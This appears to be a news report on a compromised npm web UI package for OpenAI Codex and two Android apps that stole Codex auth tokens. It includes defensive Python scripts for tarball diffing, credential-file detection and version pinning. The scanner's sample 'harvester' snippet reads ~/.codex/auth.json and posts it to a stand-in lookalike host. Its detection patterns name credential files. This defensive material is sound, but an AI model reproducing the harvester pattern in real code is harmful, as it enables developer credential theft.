Popular Codex npm package stole developer tokens for a month



TL;DR

A popular npm package for OpenAI Codex with 29,000 weekly downloads has been stealing developer authentication tokens for a month. The same credential-theft chain also ran through two Android apps with over 60,000 combined downloads.

The npm package looked legitimate. It had an active GitHub repository, steady development history, and roughly 29,000 weekly downloads. For developers using OpenAI Codex, it offered exactly what it advertised: a remote web UI for the AI coding tool.

But for the past month, every invocation of codexui-android has also been silently reading the contents of the user’s Codex authentication file and shipping it to an attacker-controlled server. The stolen data includes access tokens, refresh tokens, ID tokens, and account IDs: everything needed to impersonate the developer indefinitely.

“The refresh_token doesn’t expire,” Aikido Security researcher Charlie Eriksen wrote. “An attacker holding it can silently impersonate you indefinitely.”

How it worked

The attack was unusually sophisticated for an npm supply chain compromise. Unlike typical supply chain attacks that rely on typosquatting or disposable packages, codexui-android was a functional tool under active development. Its GitHub repository remained clean. The malicious code existed only in the npm build.
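The gap described here, a clean repository next to a tampered published artifact, is something a consumer can check directly: download the tarball npm actually serves (`npm pack <name>@<version>`), unpack it, and diff its file tree against the tagged git checkout. The script below is an added example for this article, not code from Aikido or from the package; it hashes both trees and reports files that exist only in the published artifact or differ from the repo. The `IGNORED` set and the `demo()` scenario (an extra `lib/telemetry.js` and a patched entry point) are constructed for illustration.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# Paths that legitimately differ between a git checkout and an npm tarball.
# Constructed allowlist; extend it for the project being audited.
IGNORED = {".git", ".github", "node_modules", ".gitignore", ".npmignore"}


def _digest(path: Path) -> str:
    """SHA-256 of one file, read in chunks so large bundles are fine."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: str) -> dict:
    """Map each regular file under root (relative POSIX path) to its sha256."""
    root_path = Path(root)
    out = {}
    for dirpath, dirnames, filenames in os.walk(root_path):
        dirnames[:] = [d for d in dirnames if d not in IGNORED]  # prune in place
        for name in filenames:
            if name in IGNORED:
                continue
            p = Path(dirpath) / name
            out[p.relative_to(root_path).as_posix()] = _digest(p)
    return out


def compare_trees(repo_dir: str, published_dir: str) -> dict:
    """Report how the published artifact differs from the reviewed source.

    `only_in_published` and `modified` are the buckets worth reading: that is
    code users install which never went through the repository's history.
    """
    repo, pub = snapshot(repo_dir), snapshot(published_dir)
    return {
        "only_in_published": sorted(set(pub) - set(repo)),
        "only_in_repo": sorted(set(repo) - set(pub)),
        "modified": sorted(p for p in set(repo) & set(pub) if repo[p] != pub[p]),
    }


def demo() -> dict:
    """Constructed scenario: the tarball carries an extra module and a patched
    entry point while the git tree stays clean."""
    with tempfile.TemporaryDirectory() as repo, tempfile.TemporaryDirectory() as pub:
        for base in (repo, pub):
            Path(base, "package.json").write_text('{"name":"example-ui","version":"0.0.1"}\n')
            Path(base, "lib").mkdir()
            Path(base, "lib", "server.js").write_text("module.exports = () => 'ok';\n")
        Path(repo, ".git").mkdir()  # repo metadata, not shipped; ignored
        Path(pub, "lib", "server.js").write_text(
            "require('./telemetry'); module.exports = () => 'ok';\n")
        Path(pub, "lib", "telemetry.js").write_text("// constructed placeholder module\n")
        return compare_trees(repo, pub)


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

Run `compare_trees("./checkout-at-tag", "./package")` against a real unpacked tarball; any non-empty `only_in_published` or `modified` entry that is not an expected build output (minified bundles, generated type definitions) is the file to read first. Build steps that transpile source make this noisier, so compare against the repository's own build output rather than raw source in that case.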

The package extracts the contents of Codex’s ~/.codex/auth.json file, a plaintext credential cache created whenever a user logs in via the Codex app, CLI, or IDE extension. It then sends those credentials to sentry.anyclaw[.]store, a server name chosen to mimic Sentry, the legitimate error-tracking platform.
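The two behaviours named here, reading a credential cache and posting to a brand-lookalike host, are cheap to look for in an installed package before trusting it. The scanner below is an added example written for this article (not the package's code and not an Aikido tool); it flags source that references known credential files, lists every hostname outside an expected-host allowlist, and marks hosts that borrow a brand word such as "sentry" without belonging to that brand's domain. The `EXPECTED_HOSTS`, `BRANDS` and the sample snippets in `SAMPLES` are constructed, and `sentry.lookalike.example` stands in for the naming trick described in the article.

```python
import re
from dataclasses import dataclass, field

# Credential caches a web UI for a coding agent has no reason to read.
# \W{0,8} tolerates split paths such as path.join(home, '.codex', 'auth.json').
CREDENTIAL_FILE_RES = [
    re.compile(r"\.codex\W{0,8}auth\.json"),
    re.compile(r"\.aws\W{0,8}credentials"),
    re.compile(r"\.npmrc"),
]
# Hostname of a literal URL; the optional group skips userinfo like token@host.
URL_RE = re.compile(r"https?://(?:[^\s/@'\"]+@)?([A-Za-z0-9.-]+)")
# Hosts this kind of package is expected to contact (constructed allowlist).
EXPECTED_HOSTS = {"api.openai.com", "registry.npmjs.org", "sentry.io"}
# Brand words whose presence in an unexpected hostname suggests a lookalike.
BRANDS = ("sentry", "openai", "npmjs", "github")


@dataclass
class ScanResult:
    package: str
    credential_refs: list = field(default_factory=list)
    unexpected_hosts: list = field(default_factory=list)
    lookalike_hosts: list = field(default_factory=list)

    @property
    def risk(self) -> str:
        if self.credential_refs and self.unexpected_hosts:
            return "high"    # reads a credential cache AND talks to an unknown host
        if self.credential_refs or self.unexpected_hosts:
            return "medium"  # one of the two; worth a manual look
        return "low"


def _is_expected(host: str) -> bool:
    return any(host == h or host.endswith("." + h) for h in EXPECTED_HOSTS)


def scan_source(package: str, source: str) -> ScanResult:
    """Static triage of one package's source text."""
    result = ScanResult(package)
    for pat in CREDENTIAL_FILE_RES:
        result.credential_refs.extend(m.group(0) for m in pat.finditer(source))
    for host in sorted({h.lower() for h in URL_RE.findall(source)}):
        if _is_expected(host):
            continue
        result.unexpected_hosts.append(host)
        if any(b in host for b in BRANDS):
            result.lookalike_hosts.append(host)
    return result


# Constructed JavaScript snippets standing in for installed package files.
SAMPLES = {
    "clean-ui": """
        const res = await fetch('https://api.openai.com/v1/models', { headers });
        Sentry.init({ dsn: 'https://abc@o1.ingest.sentry.io/2' });
    """,
    "local-only": """
        const p = path.join(os.homedir(), '.codex', 'auth.json');
        const creds = JSON.parse(fs.readFileSync(p, 'utf8'));
    """,
    "harvester": """
        const p = path.join(os.homedir(), '.codex', 'auth.json');
        const creds = fs.readFileSync(p, 'utf8');
        fetch('https://sentry.lookalike.example/ingest', { method: 'POST', body: creds });
    """,
}


def scan_all() -> dict:
    return {name: scan_source(name, src).risk for name, src in SAMPLES.items()}


if __name__ == "__main__":
    for name, src in SAMPLES.items():
        r = scan_source(name, src)
        print(f"{name:12} {r.risk:6} creds={r.credential_refs} lookalike={r.lookalike_hosts}")
```

This is triage, not proof: a package that assembles its hostname at runtime or decodes it from a string will slip past the URL regex, so a "low" result only means nothing obvious is in the literals. Running the package in a sandbox with outbound DNS logged is the complementary dynamic check.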

The nefarious functionality was introduced approximately a month after the package was first published, a common tactic for building user trust before deploying a payload. WHOIS records show the exfiltration domain was registered on 12 April 2026, just two days after the first package version (0.1.72) was uploaded to npm. The malicious code appeared from version 0.1.82 onward.

The same attack, from the Play Store

The npm package was not the only delivery vector. Aikido found that an Android application called OpenClaw Codex Claude AI Agent, published by a developer named BrutalStrike, was running the same npm package inside a PRoot sandbox on users’ devices. The app had accumulated more than 50,000 downloads on Google Play.

A second BrutalStrike app, simply called Codex, had over 10,000 downloads and contained the same exfiltration chain. Because neither app pinned a specific npm package version, they automatically pulled whatever was currently published, meaning the malicious code was delivered to mobile users the moment it went live.
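The point about the apps not pinning a version generalises to any manifest: a specifier that can resolve to more than one artifact (a `^`/`~` range, a dist-tag such as `latest`, a git branch) lets a later publish reach users with no action on their side. The audit below is an added example for this article, not code from the apps or from Aikido; it classifies each dependency specifier in a `package.json` as pinned or floating, handling exact versions, `npm:` aliases and git URLs pinned to a full commit. The `WEAK_MANIFEST` sample and its package names are constructed.

```python
import json
import re

# Exact semver: major.minor.patch with optional prerelease and build metadata.
EXACT_VERSION = re.compile(r"^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?$")
# A git specifier is only immutable when it ends in a full 40-hex commit hash.
GIT_COMMIT = re.compile(r"#[0-9a-f]{40}$")


def is_pinned(spec: str) -> bool:
    """True only when the specifier can resolve to exactly one artifact.

    Assumed typical npm syntax: exact versions, `npm:<name>@<version>` aliases,
    and git URLs with a commit hash count as pinned. Ranges (^ ~ >= *), dist-tags
    such as `latest`, branch names and bare URLs can change under the user.
    """
    spec = spec.strip()
    if spec.startswith("npm:"):
        # alias form; whatever follows the last '@' is the version specifier
        return bool(EXACT_VERSION.match(spec.rpartition("@")[2]))
    if spec.startswith(("git+", "git:", "github:")) or "://" in spec:
        return bool(GIT_COMMIT.search(spec))
    return bool(EXACT_VERSION.match(spec))


def audit_manifest(package_json: str) -> dict:
    """Return {section: {name: spec}} for every dependency that is not pinned."""
    manifest = json.loads(package_json)
    floating = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        bad = {n: s for n, s in manifest.get(section, {}).items() if not is_pinned(s)}
        if bad:
            floating[section] = bad
    return floating


# Constructed manifest for an app that embeds a web UI package at build time.
WEAK_MANIFEST = """{
  "name": "mobile-shell",
  "dependencies": {
    "example-web-ui": "latest",
    "express": "^4.18.2",
    "left-pad": "1.3.0",
    "fast-thing": "npm:fast-thing-fork@2.0.1",
    "tooling": "github:example/tooling#main"
  }
}"""


if __name__ == "__main__":
    for section, deps in audit_manifest(WEAK_MANIFEST).items():
        for name, spec in deps.items():
            print(f"{section}: {name} -> {spec!r} is floating; pin to an exact version")
```

Two caveats belong with this check. An app that runs `npm install <name>` on the device at runtime has no manifest to audit at all, which is the situation described above; shipping a lockfile and installing with `npm ci` is the fix there. And pinning only stops silent upgrades: if the pinned version is already the malicious one, the audit passes, so a pin change should still be reviewed like any other code change.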

The combined attack surface, roughly 29,000 weekly npm downloads plus more than 60,000 mobile installations, makes this one of the more significant credential-theft campaigns to target the AI developer tooling ecosystem.

The author’s shifting story

The npm account behind the package belongs to “friuns,” identified by Aikido as Igor Levochkin. When confronted on GitHub, the author initially claimed to have lost access to the npm account, then edited the response to say they were “currently investigating this issue internally.”

Levochkin said no credential data was shared with third parties, but did not explain why the exfiltration code was inserted only into the npm build, or why access to users’ Codex tokens was needed in the first place. The X profile linked to the account includes the domain anyclaw[.]store, the same domain to which the stolen tokens were sent.

A growing pattern

The attack arrives in a period of escalating threats to AI developer tooling. Last month, a poisoned VS Code extension breached GitHub’s own internal repositories, exfiltrating 3,800 repos after an employee installed the malicious package. That attack, attributed to the group TeamPCP, harvested credentials from 1Password vaults, Claude Code configurations, and AWS.

The lesson from both incidents is the same. As AI coding tools become essential infrastructure, the authentication tokens they generate, and often store in plaintext, are becoming high-value targets. OpenAI’s own documentation warns developers to treat ~/.codex/auth.json like a password. The codexui-android campaign is a demonstration of what happens when that advice goes unheeded, and when the tools developers trust are designed to exploit that trust.

Aikido has also separately reported that deleted Google API keys remain live for up to 23 minutes after revocation, a window attackers can exploit to access user data and Gemini conversations. Google has since classified the issue as a P0 bug. The finding underscores a broader problem: credential revocation in cloud environments is rarely as instant as defenders assume.
